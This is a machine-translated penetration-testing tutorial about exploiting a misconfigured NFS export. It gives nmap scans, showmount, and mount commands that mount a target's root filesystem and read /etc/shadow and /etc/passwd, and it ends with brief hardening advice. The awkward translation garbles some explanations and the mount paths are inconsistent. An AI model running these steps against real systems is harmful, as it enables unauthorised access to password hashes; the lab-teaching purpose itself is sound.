6-19 vulnerability exploitation -nsf to obtain the target password file

nfs Introduce

NFS（Network File System） Network file system , yes FreeBSD One of the supported file systems , It allows computers in the network to pass through TCP/IP Network sharing resources . stay NFS The application of , Local NFS Client applications of can be accessed through TCP/IP The channel reads and writes transparently at the far end NFS Files on the server , It's like accessing a local file .

It and smb The effect is similar to , But its agreement is different , We can go through nmap Target detection IP Address , Check to see if it's on NFS service ,nfs It's usually 2049 port

nmap 192.168.1.105

nmap -p 2049 -sV 192.168.1.105

Detect its specific information , function TCP port ,nfs service , And versions

We already know that the goal is on NFS, This is the time , We are about to start using nfs Read files

Target detection nfs

nmap --script=nfs-* IP
// The asterisk loads all about nfs Detected script , To detect the corresponding target IP Address 

In the process of our return , The notice is through rpcbind 111 port , To return ,nfs-showmount Show that you can escape by command , And its authority , Its contents in the directory ,nfs-statfs Show its size 、 Usage rate

nmap --script=nfs-* 192.168.42.137

Probe nfs Can I export

Except that it can be used nmap Judge nfs Can I export , We can also use showmount Command to determine “/” share （ The root of the file system ） Can I export to local . Installation may be required nfs-common The bag can only be used "showmount" command

apt-get install nfs-common
// install nfs-common package 

showmount -e IP

/* Indicates the contents under the root directory , Can be exported

View the exported content

mkdir nfs_root
// Are you sure you want to export the new content 
mount -t nfs IP Address :/ ~/nfs_root -o nolock
//-o nolock Without any treatment , Direct output 
cat ~/nfs_root/etc/shadow

mkdir nfs_root
cd nfs_root/
mount -t nfs 192.168.42.137:/ ~/nfs_root -o nolock
cat ~/nfs-root/etc/shadow
cat ~/nfs-root/etc/passwd

We have successfully utilized nfs To configure , The corresponding information is exported , Read locally , thus , We found that nfs Improper configuration , It will lead to great hidden dangers , Because it can read , All the contents of our public system , We need to nfs Impose strict restrictions , bring , We cannot read arbitrary files , Only fixed shared files can be read , Do a good job in permission control